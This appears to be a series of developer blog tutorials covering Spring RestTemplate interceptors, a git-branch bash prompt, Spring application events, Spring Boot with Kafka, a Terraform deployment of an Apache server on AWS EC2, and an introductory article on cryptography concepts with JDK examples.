Add a header to Spring RestTemplate

Today, just a short code snippet: how to add a header to Spring's ‘RestTemplate’.

import java.io.IOException;

import org.springframework.http.HttpRequest;
import org.springframework.http.client.ClientHttpRequestExecution;
import org.springframework.http.client.ClientHttpRequestInterceptor;
import org.springframework.http.client.ClientHttpResponse;

public class HeaderRequestInterceptor implements ClientHttpRequestInterceptor {

    private final String headerName;
    private final String headerValue;

    public HeaderRequestInterceptor(String headerName, String headerValue) {
        this.headerName = headerName;
        this.headerValue = headerValue;
    }

    @Override
    public ClientHttpResponse intercept(HttpRequest request, byte[] body, ClientHttpRequestExecution execution) throws IOException {
        request.getHeaders().set(headerName, headerValue);
        return execution.execute(request, body);
    }
}

Now, we add it to our ‘RestTemplate’:

List<ClientHttpRequestInterceptor> interceptors = new ArrayList<ClientHttpRequestInterceptor>();
interceptors.add(new HeaderRequestInterceptor("X-Custom-Header", "<custom_value>"));

RestTemplate restTemplate = new RestTemplate();
restTemplate.setInterceptors(interceptors);
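
If we prefer to do this wiring once and reuse the configured instance everywhere, a minimal sketch (the configuration class name is just a placeholder) could expose the ‘RestTemplate’ as a Spring bean:

import java.util.Collections;

import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.client.RestTemplate;

@Configuration
public class RestTemplateConfig {

    // Every request made through this bean will go through the interceptor.
    // The header name and value are the same placeholders used above.
    @Bean
    public RestTemplate restTemplate() {
        RestTemplate restTemplate = new RestTemplate();
        restTemplate.setInterceptors(
                Collections.singletonList(new HeaderRequestInterceptor("X-Custom-Header", "<custom_value>")));
        return restTemplate;
    }
}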

And, that’s all.

Just an extra side note. As of Spring Framework 5, a new HTTP client called ‘WebClient’ has been added and it is expected that ‘RestTemplate’ will be deprecated at some point. If we are starting a new application, especially if we are using the ‘WebFlux’ stack, the new client will be a better choice.


Git branch on terminal prompt

There are a lot of GUI tools to interact with git these days but a lot of us are still using the terminal for that. One thing I have found very useful, once you are in a folder with a git repository, is to be able to see the branch in use on the terminal prompt. We can achieve this with a few steps.

Step 1

Let's check the current definition of our prompt. Mine looks something like:

echo $PS1
\[\e]0;\u@\h: \w\a\]\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]$

Step 2

Open the file ‘~/.bashrc’ with our favourite editor. In my case, ‘Vim’.

Step 3

Let's create a small function to figure out the branch we are on whenever the current folder contains a git repository.

# Print the current git branch (if any) wrapped in parentheses
git_branch() {
  git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/'
}

Step 4

Let's redefine the variable ‘PS1’ to include the function we have just defined. In addition, let's add some colour to the branch name to be able to see it easily. Taking my initial values and adding the function call, the result should be something like:

export PS1="\[\e]0;\u@\h: \w\a\]${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\] \[\033[00;32m\]\$(git_branch)\[\033[00m\]\$ "

And, once we reload the configuration (for example, with ‘source ~/.bashrc’), the prompt should show the current branch next to the working directory, something like:

user@host:~/my-repo (master)$

Spring Application Events

Today, we are going to implement a simple example using spring application events.

Spring application events allow us to throw and listen to specific application events that we can process as we wish. Events are meant for exchanging information between loosely coupled components. As there is no direct coupling between publishers and subscribers, it enables us to modify subscribers without affecting the publishers and vice-versa.

To build our PoC and to execute it, we are going to need just a few classes. We will start with a basic Spring Boot project with the ‘web’ starter. And, once we have that in place (you can use the Spring Initializr) we can start adding our classes.

Let's start with a very basic ‘User’ model:

public class User {

    private String firstname;
    private String lastname;

    public String getFirstname() {
        return firstname;
    }

    public User setFirstname(String firstname) {
        this.firstname = firstname;
        return this;
    }

    public String getLastname() {
        return lastname;
    }

    public User setLastname(String lastname) {
        this.lastname = lastname;
        return this;
    }

    @Override
    public String toString() {
        return "User{" +
                "firstname='" + firstname + '\'' +
                ", lastname='" + lastname + '\'' +
                '}';
    }
}

Nothing out of the ordinary here. Just a couple of properties and some getter and setter methods.

Now, let’s build a basic service that is going to simulate a ‘register’ operation:

...
import org.springframework.context.ApplicationEventPublisher;
...

@Service
public class UserService {

    private static final Logger logger = LoggerFactory.getLogger(UserService.class);

    private final ApplicationEventPublisher publisher;

    public UserService(ApplicationEventPublisher publisher) {
        this.publisher = publisher;
    }

    public void register(final User user) {
        logger.info("Registering {}", user);

        publisher.publishEvent(new UserRegistered(user));
    }
}

Here we have the first reference to the event classes the Spring Framework offers us: the ‘ApplicationEventPublisher’, which allows us to publish the desired event to be consumed by the listeners.

The second reference to the events framework appears when we create the event class we are going to send. In this case, it is the class ‘UserRegistered’ we can see on the publishing line above.

...
import org.springframework.context.ApplicationEvent;

public class UserRegistered extends ApplicationEvent {

    public UserRegistered(User user) {
        super(user);
    }
}

As we can see, by extending the class ‘ApplicationEvent’ we very easily obtain something we can publish and listen to.

Now, let's implement some listeners. The first one is going to implement the interface ‘ApplicationListener’ and the second one is going to be annotation based. These are two simple options offered by Spring to build our listeners.

...
import org.springframework.context.ApplicationListener;
import org.springframework.context.event.EventListener;
import org.springframework.stereotype.Component;

public class UserListeners {

    // Technical note: By default listener events return 'void'. If an object is returned, it will be published as an event

    /**
     * Example of event listener using the implementation of {@link ApplicationListener}
     */
    @Component
    static class RegisteredListener implements ApplicationListener<UserRegistered> {

        private static final Logger logger = LoggerFactory.getLogger(RegisteredListener.class);

        @Override
        public void onApplicationEvent(UserRegistered event) {
            logger.info("Registration event received for {}", event);
        }
    }

    /**
     * Example of annotation based event listener
     */
    @Component
    static class RegisteredAnnotatedListener {

        private static final Logger logger = LoggerFactory.getLogger(RegisteredAnnotatedListener.class);

        @EventListener
        void on(final UserRegistered event) {
            logger.info("Annotated registration event received for {}", event);
        }
    }
}

As we can see, very basic stuff. It is worth mentioning the ‘Technical note’. By default, the listener methods return ‘void’; they are designed to receive an event, do some work and finish. But, obviously, they can at the same time publish new messages, and we can achieve this easily by returning an object. The returned object will be published as any other event.
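
As a small, hypothetical sketch of that last point (the ‘WelcomeEmailRequested’ class and the ‘WelcomeEmailTrigger’ listener are not part of the example project, just an illustration), a listener method that returns an object ends up publishing that object as a new event:

import org.springframework.context.event.EventListener;
import org.springframework.stereotype.Component;

// Hypothetical follow-up event, not part of the original example
class WelcomeEmailRequested {

    private final User user;

    WelcomeEmailRequested(User user) {
        this.user = user;
    }

    public User getUser() {
        return user;
    }
}

@Component
class WelcomeEmailTrigger {

    // Because the method returns an object instead of 'void',
    // Spring publishes the returned value as a new application event
    @EventListener
    WelcomeEmailRequested on(final UserRegistered event) {
        return new WelcomeEmailRequested((User) event.getSource());
    }
}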

Once we have all of this, let’s build a simple controller to run the process:

@RestController
@RequestMapping("/api/users")
public class UserController {

    private final UserService userService;

    public UserController(UserService userService) {
        this.userService = userService;
    }

    @GetMapping
    @ResponseStatus(HttpStatus.CREATED)
    public void register(@RequestParam("firstname") final String firstname,
                         @RequestParam("lastname") final String lastname) {
        Objects.requireNonNull(firstname);
        Objects.requireNonNull(lastname);

        userService.register(new User().setFirstname(firstname).setLastname(lastname));
    }
}

Nothing out of the ordinary, simple stuff.

We can invoke the controller with any tool we want but a simple way is to use cURL.

curl -X GET "http://localhost:8080/api/users?firstname=john&lastname=doe"

Once we call the endpoint, we can see the log messages generated by the publisher and the listeners:

Registering User{firstname='john', lastname='doe'}
Annotated registration event received for dev.binarycoders.spring.event.UserRegistered
Registration event received for dev.binarycoders.spring.event.UserRegistered

As we can see, the ‘register’ action is executed, it publishes the event and both listeners, the annotated one and the implemented one, receive and process the message.

As usual you can find the source for this example here, in the ‘spring-events’ module.

For some extra information, you can take a look at one of the videos of the last SpringOne.


Spring Boot with Kafka

Today we are going to build a very simple demo code using Spring Boot and Kafka.

The application is going to contain a simple producer and consumer. In addition, we will add a simple endpoint to test our development and configuration.

Let’s start.

The project is going to be using:

  • Java 14
  • Spring Boot 2.3.4

A good place to start generating our project is Spring Initializr. There we can easily create the skeleton of our project, adding some basic information about it. We will be adding the following dependencies:

  • Spring Web.
  • Spring for Apache Kafka.
  • Spring Configuration Processor (Optional).

Once we are done filling the form we only need to generate the code and open it on our favourite code editor.

As an optional dependency, I have added the "Spring Boot Configuration Processor" dependency to be able to define some extra properties that we will be using in the "application.properties" file. As I have said, it is optional; we will be able to define and use the properties without it, but it gets rid of the warning about them not being defined. Up to you.

With the three dependencies, our "pom.xml" should look something like:

<dependency>
  <groupId>org.springframework.boot</groupId>
  <artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
  <groupId>org.springframework.kafka</groupId>
  <artifactId>spring-kafka</artifactId>
</dependency>
<dependency>
  <groupId>org.springframework.boot</groupId>
  <artifactId>spring-boot-configuration-processor</artifactId>
  <optional>true</optional>
</dependency>

The next step is going to be creating our Kafka producer and consumer to be able to send messages using the distributed event streaming platform.

For the producer code we are just going to create a basic method to send a message making use of the “KafkaTemplate” offered by Spring.

@Service
public class KafkaProducer {
    public static final String TOPIC_NAME = "example_topic";

    private final KafkaTemplate<String, String> kafkaTemplate;

    public KafkaProducer(KafkaTemplate<String, String> kafkaTemplate) {
        this.kafkaTemplate = kafkaTemplate;
    }

    public void send(final String message) {
        kafkaTemplate.send(TOPIC_NAME, message);
    }
}

The consumer code is going to be even simpler thanks to the "KafkaListener" annotation provided by Spring.

@Service
public class KafkaConsumer {

    @KafkaListener(topics = {KafkaProducer.TOPIC_NAME}, groupId = "example_group_id")
    public void read(final String message) {
        System.out.println(message);
    }
}

And finally, to be able to test it, we are going to define a Controller to invoke the Kafka producer.

@RestController
@RequestMapping("/kafka")
public class KafkaController {

    private final KafkaProducer kafkaProducer;

    public KafkaController(KafkaProducer kafkaProducer) {
        this.kafkaProducer = kafkaProducer;
    }

    @PostMapping("/publish")
    public void publish(@RequestBody String message) {
        Objects.requireNonNull(message);

        kafkaProducer.send(message);
    }
}

With this, all the necessary code is done. Let’s now go for the configuration properties and the necessary Docker images to run all of this.

First, the “application.properties” file. It is going to contain some basic configuration properties for the producer and consumer.

server.port=8081

spring-boot-kafka.config.kafka.server=localhost
spring-boot-kafka.config.kafka.port=9092

# Kafka consumer properties
spring.kafka.consumer.bootstrap-servers=${spring-boot-kafka.config.kafka.server}:${spring-boot-kafka.config.kafka.port}
spring.kafka.consumer.group-id=example_group_id
spring.kafka.consumer.auto-offset-reset=earliest
spring.kafka.consumer.key-deserializer=org.apache.kafka.common.serialization.StringDeserializer
spring.kafka.consumer.value-deserializer=org.apache.kafka.common.serialization.StringDeserializer

# kafka producer properties
spring.kafka.producer.bootstrap-servers=${spring-boot-kafka.config.kafka.server}:${spring-boot-kafka.config.kafka.port}
spring.kafka.producer.key-serializer=org.apache.kafka.common.serialization.StringSerializer
spring.kafka.producer.value-serializer=org.apache.kafka.common.serialization.StringSerializer

Looking at the consumer properties, we can see the property "spring.kafka.consumer.group-id". If we look carefully at it, we will see that it matches the "groupId" we previously defined on the consumer.

The "key-deserializer"/"value-deserializer" and "key-serializer"/"value-serializer" properties define the serialisation and de-serialisation classes for the consumer and the producer.

Finally, the two "spring-boot-kafka.config.kafka.*" properties at the top have been defined to avoid repetition. These are the properties that show us a warning message because they are not standard Spring Boot properties.

To fix it, if we previously added the "Spring Boot Configuration Processor" dependency, we can now add the file:

spring-boot-kafka/src/main/resources/META-INF/additional-spring-configuration-metadata.json

With the definition of these properties:

{
  "properties": [
    {
      "name": "spring-boot-kafka.config.kafka.server",
      "type": "java.lang.String",
      "description": "Location of the Kafka server."
    },
    {
      "name": "spring-boot-kafka.config.kafka.port",
      "type": "java.lang.String",
      "description": "Port of the Kafka server."
    }
  ]
}

We are almost there. The only thing remaining is Apache Kafka itself. Because we do not want to deal with the complexity of setting up an Apache Kafka server, we are going to leverage the power of Docker and create a "docker-compose" file to run it for us:

version: '3'

services:
  zookeeper:
    image: wurstmeister/zookeeper
    ports:
      - 2181:2181
    container_name: zookeeper

  kafka:
    image: wurstmeister/kafka
    ports:
      - 9092:9092
    environment:
      KAFKA_ADVERTISED_HOST_NAME: localhost
      KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
      KAFKA_CREATE_TOPICS: "example_topic:1:1" # topic:partitions:replicas (single broker)

As we can see, simple stuff, nothing out of the ordinary. Two images, one for ZooKeeper and one for Apache Kafka, the definition of some ports (remember to match them with the ones in the "application.properties" file) and a few variables needed by the Apache Kafka image.

With this, we can run the docker-compose file ("docker-compose up -d") and we should end up with the two containers running.

Now, we can test the endpoint we have built previously. In this case, to make it simple, we are going to use cURL:

curl -d '{"message":"Hello from Kafka!"}' -H "Content-Type: application/json" -X POST http://localhost:8081/kafka/publish

The result should be the message printed on the application console by the consumer.

And, this is all. You can find the full source code here.

Enjoy it!


Terraform: EC2 + Apache

Today, let's do some hands-on work. We are going to have a (very) short introduction to Terraform and, in addition to reviewing some commands, we are going to deploy on AWS an EC2 instance with a running Apache server.

It is assumed the reader has some basic AWS knowledge for this article, because the different components created on AWS and the reason they are created are not in the scope of this small demo. If you, as a reader, do not have any previous knowledge of AWS, you can still follow the demo and take the opportunity to learn about a few basic components of AWS and one of the most basic architectures.

We are going to be using Terraform version 0.12.29 for this small demo.

Terraform is a tool that allows us to specify, provision and manage our infrastructure and run it on the most popular providers. It is a tool that embraces the principle of Infrastructure as Code.

Some basic commands we will be using during this article are:

  • init: The ‘terraform init‘ command is used to initialize a working directory containing Terraform configuration files. This is the first command that should be run after writing a new Terraform configuration or cloning an existing one from version control. It is safe to run this command multiple times.
  • validate: The ‘terraform validate‘ command validates the configuration files in a directory, referring only to the configuration and not accessing any remote services such as remote state, provider APIs, etc.
  • plan: The ‘terraform plan‘ command is used to create an execution plan. Terraform performs a refresh, unless explicitly disabled, and then determines what actions are necessary to achieve the desired state specified in the configuration files.
  • apply: The ‘terraform apply‘ command is used to apply the changes required to reach the desired state of the configuration or the pre-determined set of actions generated by a terraform plan execution plan. A specific resource can be addressed with the flag ‘-target‘.
  • destroy: The ‘terraform destroy‘ command is used to destroy the Terraform-managed infrastructure. A specific resource can be addressed with the flag ‘-target‘.

Option ‘-auto-approve‘ skips the confirmation (yes).

The infrastructure we are going to need to deploy our Apache server on AWS is:

  1. Create a VPC
  2. Create an internet gateway
  3. Create a custom route table
  4. Create a subnet
  5. Associate the subnet with the route table
  6. Create a security group to allow ports 22, 80, 443
  7. Create a network interface with IP in the subnet
  8. Assign an elastic IP to the network interface
  9. Create an Ubuntu server and install/enable Apache 2

Let’s build our infrastructure now.

The first thing we need to do is to define our provider. In this case, AWS.

# Configure the AWS Provider
provider "aws" {
  version = "~> 2.70"
  # Optional
  region  = "eu-west-1"
}

Now, we can start to follow the steps defined previously:

# 1. Create a VPC
resource "aws_vpc" "pr03-vpc" {
  cidr_block = "10.0.0.0/16"

  tags = {
    Name = "pr03-vpc"
  }
}

Here, we are creating a VPC and assigning a range of IPs.

# 2. Create an internet gateway
resource "aws_internet_gateway" "pr03-gw" {
  vpc_id = aws_vpc.pr03-vpc.id

  tags = {
    Name = "pr03-gw"
  }
}

In this step, we are defining our Internet Gateway and attaching it to the created VPC.

# 3. Create a custom route table
resource "aws_route_table" "pr03-r" {
  vpc_id = aws_vpc.pr03-vpc.id

  route {
    cidr_block = "0.0.0.0/0"
    gateway_id = aws_internet_gateway.pr03-gw.id
  }

  route {
    ipv6_cidr_block = "::/0"
    gateway_id      = aws_internet_gateway.pr03-gw.id
  }

  tags = {
    Name = "pr03-r"
  }
}

Now, we need to allow the traffic to arrive at our gateway. In this case, we are creating an entry for IPv4 and one for IPv6.

# 4. Create a subnet
resource "aws_subnet" "pr03-subnet-1" {
  vpc_id            = aws_vpc.pr03-vpc.id
  cidr_block        = "10.0.1.0/24"
  availability_zone = "eu-west-1a"

  tags = {
    Name = "pr03-subnet-1"
  }
}

In this step, we are creating a subnet in our VPC where our server will live.

# 5. Associate the subnet with the route table
resource "aws_route_table_association" "pr03-a" {
  subnet_id      = aws_subnet.pr03-subnet-1.id
  route_table_id = aws_route_table.pr03-r.id
}

And, we need to associate the subnet with the routing table.

# 6. Create a security group to allow ports 22, 80, 443
resource "aws_security_group" "pr03-allow_web_traffic" {
  name        = "allow_web_traffic"
  description = "Allow web traffic"
  vpc_id      = aws_vpc.pr03-vpc.id

  ingress {
    description = "SSH"
    from_port   = 22
    to_port     = 22
    protocol    = "tcp"
    # We want internet to access it
    cidr_blocks = ["0.0.0.0/0"]
  }

  ingress {
    description = "HTTP"
    from_port   = 80
    to_port     = 80
    protocol    = "tcp"
    # We want internet to access it
    cidr_blocks = ["0.0.0.0/0"]
  }

  ingress {
    description = "HTTPS"
    from_port   = 443
    to_port     = 443
    protocol    = "tcp"
    # We want internet to access it
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }

  tags = {
    Name = "pr03-allow_web_traffic"
  }
}

Now, it is time to create our security group to guarantee only the ports we want are accessible and nothing else. In this specific case, the ports are going to be 22, 80 and 443 for incoming traffic and we are going to allow all outgoing traffic.

# 7. Create a network interface with an ip in the subnet
resource "aws_network_interface" "pr03-nic" {
  subnet_id       = aws_subnet.pr03-subnet-1.id
  private_ips     = ["10.0.1.50"]
  security_groups = [aws_security_group.pr03-allow_web_traffic.id]
}

The next step is to create a network interface in our subnet.

# 8. Assign an elastic IP to the network interface
resource "aws_eip" "pr03-eip" {
  vpc                       = true
  network_interface         = aws_network_interface.pr03-nic.id
  associate_with_private_ip = "10.0.1.50"
  depends_on                = [aws_internet_gateway.pr03-gw]
}

And, we associate an Elastic IP with the network interface to make the server reachable from the Internet.

# 9. Create an Ubuntu server and install/enable Apache 2
resource "aws_instance" "pr03-web_server" {
  ami               = "ami-099926fbf83aa61ed"
  instance_type     = "t2.micro"
  availability_zone = "eu-west-1a"
  key_name          = "terraform-tutorial"

  network_interface {
    device_index         = 0
    network_interface_id = aws_network_interface.pr03-nic.id
  }

  # Install Apache 2
  user_data = <<-EOF
              #!/bin/bash
              sudo apt update -y
              sudo apt install apache2 -y
              sudo systemctl start apache2
              sudo bash -c 'echo your very first web server > /var/www/html/index.html'
              EOF

  tags = {
    Name = "pr03-web_server"
  }
}

Almost the last step is to create our Ubuntu server and install our Apache service.

Finally, we are going to add a few outputs to check some of the resultant information after the execution has been completed. Just to double-check everything has worked without the need to go to the AWS Console:

# Print the elastic IP when execution finishes
output "server_public_ip" {
  value = aws_eip.pr03-eip.public_ip
}

# Print the private IP of the server when execution finishes
output "server_private_ip" {
  value = aws_instance.pr03-web_server.private_ip
}

# Print the ID of the server when execution finishes
output "server_id" {
  value = aws_instance.pr03-web_server.id
}

With all of this created, we can start executing Terraform commands.

  1. terraform init: This will initialise Terraform in the working directory.
  2. terraform plan: It will show us what actions are going to be executed.
  3. terraform apply -auto-approve: It will execute our changes in AWS.

If you have been following along with these steps, once the terraform apply command has been executed, we will see something like:

Execution result

Now, we can check on the AWS Console that our different components are there and, using the public IP, that the Apache service is running.

In theory, everything we have deployed on AWS, if you have followed all the steps, belongs to the AWS Free Tier but, just in case, and to avoid any costs, let's take down our infrastructure now. For this, we will execute the terraform destroy command:

terraform destroy -auto-approve

The code for this demo can be found here.


CEH (XXI): Cryptography

The index of this series of articles can be found here.

Confidentiality, integrity and availability are the three basic components around which we should build and maintain our security model. Encryption is one of the tools we have available to achieve this and it can help us to make communications safer and ensure that only the sender and receiver can read clear text data.

Cryptography Concepts

Cryptography

Cryptography is the study of secure communications techniques that allow only the sender and intended recipient of a message to view its contents. The term is derived from the Greek word kryptos, which means hidden. It is closely associated with encryption, which is the act of scrambling ordinary text into what is known as ciphertext and then back again upon arrival. In addition, cryptography also covers the obfuscation of information in images using techniques such as microdots or merging. Ancient Egyptians were known to use these methods in complex hieroglyphics, and the Roman general Julius Caesar is credited with using one of the first modern cyphers.

The objective of cryptography is not only confidentiality, but it also includes integrity, authentication and non-repudiation.

Types of Cryptography

Symmetric Cryptography

Symmetric key algorithms are those which use the same key for both encryption and decryption of data. This key is generally a shared secret between the parties that want to encrypt or decrypt the data.

The most widely used symmetric cyphers are AES and DES.

Symmetric encryption
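
As a small illustration (not part of the CEH material itself), a symmetric encryption and decryption round-trip with AES using the standard JDK APIs could look like the following sketch; both sides must hold the same secret key:

import java.nio.charset.StandardCharsets;
import java.util.Base64;

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;

public class SymmetricExample {

    public static void main(String[] args) throws Exception {
        // Generate a shared AES key (256 bits; use 128 if the JRE restricts key lengths)
        KeyGenerator keyGenerator = KeyGenerator.getInstance("AES");
        keyGenerator.init(256);
        SecretKey key = keyGenerator.generateKey();

        // Encrypt with the shared key. A real system would pick an explicit
        // mode and padding (e.g. AES/GCM/NoPadding) and manage IVs.
        Cipher cipher = Cipher.getInstance("AES");
        cipher.init(Cipher.ENCRYPT_MODE, key);
        byte[] ciphertext = cipher.doFinal("my secret message".getBytes(StandardCharsets.UTF_8));
        System.out.println(Base64.getEncoder().encodeToString(ciphertext));

        // Decrypt with the very same key
        cipher.init(Cipher.DECRYPT_MODE, key);
        System.out.println(new String(cipher.doFinal(ciphertext), StandardCharsets.UTF_8));
    }
}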

Asymmetric Cryptography / Public Key Cryptography

Asymmetric cryptography, also known as public-key cryptography, is a process that uses a pair of related keys, one public key and one private key, to encrypt and decrypt a message and protect it from unauthorized access or use. A public key is a cryptographic key that can be used by any person to encrypt a message so that it can only be deciphered by the intended recipient with their private key. A private key, also known as a secret key, is shared only with the key's initiator.

Many protocols rely on asymmetric cryptography, including the transport layer security (TLS) and secure sockets layer (SSL) protocols, which make HTTPS possible. The encryption process is also used in software programs such as browsers that need to establish a secure connection over an insecure network like the Internet or need to validate a digital signature.

RSA, DSA and the Diffie-Hellman algorithm are popular examples of asymmetric cyphers.

Usually, private keys are known only by the owner and public keys are issued by using a Public Key Infrastructure (PKI) where a trusted Certification Authority certifies the ownership of the key pairs.

Asymmetric encryption
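
Again purely as an illustration with the JDK, encrypting with the recipient's public key and decrypting with the matching private key could look like this sketch:

import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;

import javax.crypto.Cipher;

public class AsymmetricExample {

    public static void main(String[] args) throws Exception {
        // The recipient generates a key pair and shares only the public key
        KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
        generator.initialize(2048);
        KeyPair keyPair = generator.generateKeyPair();

        // The sender encrypts with the recipient's public key
        Cipher cipher = Cipher.getInstance("RSA");
        cipher.init(Cipher.ENCRYPT_MODE, keyPair.getPublic());
        byte[] ciphertext = cipher.doFinal("for your eyes only".getBytes(StandardCharsets.UTF_8));

        // Only the recipient, holding the private key, can decrypt it
        cipher.init(Cipher.DECRYPT_MODE, keyPair.getPrivate());
        System.out.println(new String(cipher.doFinal(ciphertext), StandardCharsets.UTF_8));
    }
}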

Government Access to Keys

Under the Government Access to Keys (GAK) schema, software companies give copies of all keys to the government, and the government promises that it will hold on to the keys in a secure way and will only use them when a court issues a warrant to do so.

Encryption Algorithms

A cypher is a set of rules by which we implement encryption. Thousands of cypher algorithms are available on the Internet. Some of them are proprietary while others are open source. Common methods by which cyphers replace original data with encrypted data are:

Substitution

The simple substitution cypher is a cypher that has been in use for many hundreds of years (an excellent history is given in Simon Singh's ‘The Code Book’). It basically consists of substituting every plaintext character for a different ciphertext character. It differs from the Caesar cypher in that the cypher alphabet is not simply the alphabet shifted, it is completely jumbled.

The simple substitution cypher offers very little communication security, and it will be shown that it can be easily broken even by hand, especially as the messages become longer (more than several hundred ciphertext characters).
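
A toy sketch of the idea (the jumbled cipher alphabet below is arbitrary, and a real attacker would break it quickly with frequency analysis):

import java.util.HashMap;
import java.util.Map;

public class SubstitutionCipherExample {

    private static final String PLAIN  = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    private static final String CIPHER = "QWERTYUIOPASDFGHJKLZXCVBNM";

    public static void main(String[] args) {
        System.out.println(encrypt("HELLO WORLD"));   // ITSSG VGKSR
    }

    static String encrypt(String plaintext) {
        Map<Character, Character> mapping = new HashMap<>();
        for (int i = 0; i < PLAIN.length(); i++) {
            mapping.put(PLAIN.charAt(i), CIPHER.charAt(i));
        }

        StringBuilder result = new StringBuilder();
        for (char c : plaintext.toCharArray()) {
            // Characters outside the alphabet (spaces, punctuation) are left untouched
            result.append(mapping.getOrDefault(c, c));
        }
        return result.toString();
    }
}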

Polyalphabetic

The development of Polyalphabetic Substitution Ciphers was the cryptographers' answer to Frequency Analysis. The first known polyalphabetic cypher was the Alberti Cipher invented by Leon Battista Alberti in around 1467. He used a mixed alphabet to encrypt the plaintext, but at random points he would change to a different mixed alphabet, indicating the change with an uppercase letter in the ciphertext. In order to utilise this cypher, Alberti used a cypher disc to show how plaintext letters are related to ciphertext letters.

Alberti cypher disc

Stream Cypher

A stream cypher is an encryption algorithm that encrypts 1 bit or byte of plaintext at a time. It uses an infinite stream of pseudorandom bits as the key. For a stream cypher implementation to remain secure, its pseudorandom generator should be unpredictable and the key should never be reused. Stream cyphers are designed to approximate an idealized cypher, known as the One-Time Pad.

The One-Time Pad, which is supposed to employ a purely random key, can potentially achieve “perfect secrecy”. That is, it is supposed to be fully immune to brute force attacks. The problem with the one-time pad is that, in order to create such a cypher, its key should be as long or even longer than the plaintext.
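
A toy sketch of the one-time pad idea: XOR the plaintext with a random key of the same length, and XOR the ciphertext with the same key to recover it (the key must never be reused):

import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;

public class OneTimePadExample {

    public static void main(String[] args) {
        byte[] plaintext = "attack at dawn".getBytes(StandardCharsets.UTF_8);

        // The key is random and exactly as long as the message
        byte[] key = new byte[plaintext.length];
        new SecureRandom().nextBytes(key);

        byte[] ciphertext = xor(plaintext, key);
        byte[] recovered = xor(ciphertext, key);

        System.out.println(new String(recovered, StandardCharsets.UTF_8)); // attack at dawn
    }

    private static byte[] xor(byte[] data, byte[] key) {
        byte[] result = new byte[data.length];
        for (int i = 0; i < data.length; i++) {
            result[i] = (byte) (data[i] ^ key[i]);
        }
        return result;
    }
}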

Popular Stream Cyphers

  • RC4: Rivest Cipher 4 (RC4) is the most widely used of all stream cyphers, particularly in software. It is also known as ARCFOUR or ARC4. RC4 stream cyphers have been used in various protocols like WEP and WPA (both security protocols for wireless networks) as well as in TLS. Unfortunately, recent studies have revealed vulnerabilities in RC4, prompting Mozilla and Microsoft to recommend that it be disabled where possible. In fact, RFC 7465 prohibits the use of RC4 in all versions of TLS. There are newer versions, RC5 and RC6.

Block Cipher

A block cypher is an encryption algorithm that encrypts a fixed size of n-bits of data, known as a block, at one time. The usual sizes of each block are 64 bits, 128 bits, and 256 bits. So for example, a 64-bit block cypher will take in 64 bits of plaintext and encrypt it into 64 bits of ciphertext. In cases where the plaintext is shorter than the block size, padding schemes are called into play. The majority of the symmetric cyphers used today are actually block cyphers. DES, Triple DES, AES, IDEA, and Blowfish are some of the commonly used encryption algorithms that fall under this group.

Popular Block Cyphers

  • DES: Data Encryption Standard (DES) used to be the most popular block cypher in the world and was used in several industries. It is still popular today, but only because it is usually included in historical discussions of encryption algorithms. The DES algorithm became a standard in the US in 1977. However, it has already been proven to be vulnerable to brute force attacks and other cryptanalytic methods. DES is a 64-bit cypher that works with a 64-bit key. Actually, 8 of the 64 bits in the key are parity bits, so the key size is technically 56 bits long.
  • 3DES: As its name implies, 3DES is a cypher based on DES. It is practically DES that is run three times. Each DES operation can use a different key, with each key being 56 bits long. Like DES, 3DES has a block size of 64 bits. Although 3DES is many times stronger than DES, it is also much slower (about 3x slower). Because many organizations found 3DES to be too slow for many applications, it never became the ultimate successor of DES.
  • AES: A US Federal Government standard since 2002, AES or Advanced Encryption Standard is arguably the most widely used block cypher in the world. It has a block size of 128 bits and supports three possible key sizes: 128, 192, and 256 bits. The longer the key size, the stronger the encryption. However, longer keys also result in longer processes of encryption.
  • Blowfish: This is another popular block cypher (although not as widely used as AES). It has a block size of 64 bits and supports a variable-length key that can range from 32 to 448 bits. One thing that makes blowfish so appealing is that Blowfish is unpatented and royalty-free.
  • Twofish: This cypher is related to Blowfish but it is not as popular. It is a 128-bit block cypher that supports key sizes up to 256 bits long.

DSA and Related Signature Schemes

The DSA algorithm works in the framework of public-key cryptosystems and is based on the algebraic properties of modular exponentiation, together with the discrete logarithm problem, which is considered to be computationally intractable. The algorithm uses a key pair consisting of a public key and a private key. The private key is used to generate a digital signature for a message, and such a signature can be verified by using the signer’s corresponding public key. The digital signature provides message authentication (the receiver can verify the origin of the message), integrity (the receiver can verify that the message has not been modified since it was signed) and non-repudiation (the sender cannot falsely claim that they have not signed the message).
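
As an illustration with the JDK (Java 8 or later), signing with a DSA private key and verifying with the corresponding public key could look like this sketch:

import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;

public class DsaSignatureExample {

    public static void main(String[] args) throws Exception {
        // The signer generates a DSA key pair and publishes the public key
        KeyPairGenerator generator = KeyPairGenerator.getInstance("DSA");
        generator.initialize(2048);
        KeyPair keyPair = generator.generateKeyPair();

        byte[] message = "document to sign".getBytes(StandardCharsets.UTF_8);

        // The sender signs the message with the private key
        Signature signer = Signature.getInstance("SHA256withDSA");
        signer.initSign(keyPair.getPrivate());
        signer.update(message);
        byte[] signature = signer.sign();

        // Anyone can verify the signature with the sender's public key
        Signature verifier = Signature.getInstance("SHA256withDSA");
        verifier.initVerify(keyPair.getPublic());
        verifier.update(message);
        System.out.println(verifier.verify(signature)); // prints true
    }
}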

A digital certificate contains various items that are:

  • Subject: Certificate’s holder name.
  • Serial Number: Unique number to identify the certificate.
  • Public key: A public copy of the public key of the certificate holder.
  • Issuer: Certificate issuing authority’s digital signature to verify that the certificate is real.
  • Signature algorithm: Algorithm used to digitally sign a certificate by the Certification Authority (CA).
